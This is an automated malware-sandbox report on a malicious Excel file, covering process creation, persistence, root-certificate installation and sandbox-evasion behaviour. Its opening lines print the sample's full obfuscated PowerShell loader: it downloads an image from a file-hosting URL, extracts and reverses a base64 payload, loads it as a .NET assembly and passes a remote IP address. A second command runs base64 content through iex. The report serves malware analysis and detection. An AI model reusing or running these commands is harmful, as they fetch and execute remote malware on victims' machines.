                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'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'+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,30_2_004044A4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C022D push eax; iretd 5_2_000007FE899C0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C00BD pushad ; iretd 5_2_000007FE899C00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044693D push ecx; ret 30_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044DB70 push eax; ret 30_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044DB70 push eax; ret 30_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00451D54 push eax; ret 30_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B090 push eax; ret 31_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B090 push eax; ret 31_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00451D34 push eax; ret 31_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00444E71 push ecx; ret 31_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414060 push eax; ret 33_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414060 push eax; ret 33_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00414039 push ecx; ret 33_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004164EB push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00416553 push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00416555 push 0000006Ah; retf 33_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004567E0 push eax; ret 35_2_004567FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0045B9DD push esi; ret 35_2_0045B9E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00463EF3 push ds; retf 35_2_00463EEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00455EAF push ecx; ret 35_2_00455EC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433FF6 push ecx; ret 35_2_00434009

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406128 ShellExecuteW,URLDownloadToFileW,35_2_00406128
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,35_2_00419BC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_004047CB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: OC25-11-24.xlsStream path 'MBd00033107/Package' entropy: 7.96667071557 (max. 8.0)
                  Source: OC25-11-24.xlsStream path 'Workbook' entropy: 7.98371213619 (max. 8.0)
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'MBd00033107/Package' entropy: 7.96667071557 (max. 8.0)
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'Workbook' entropy: 7.98371213619 (max. 8.0)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040E54F Sleep,ExitProcess,35_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,30_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,35_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4398
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2142
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5831
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1391
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6599
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1520
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1786
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1630
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1926
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1898
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 880
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1836
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6095
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.3 %
                  Source: C:\Windows\System32\mshta.exe TID: 3672Thread sleep time: -360000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -240000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 2142 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 5831 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep count: 6599 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2988Thread sleep count: 1520 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -1200000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2112Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\mshta.exe TID: 1256Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep count: 1786 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep count: 1630 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3112Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1932Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 1926 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 1898 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3248Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 880 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 639 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 1836 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep count: 6095 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -600000s >= -30000s
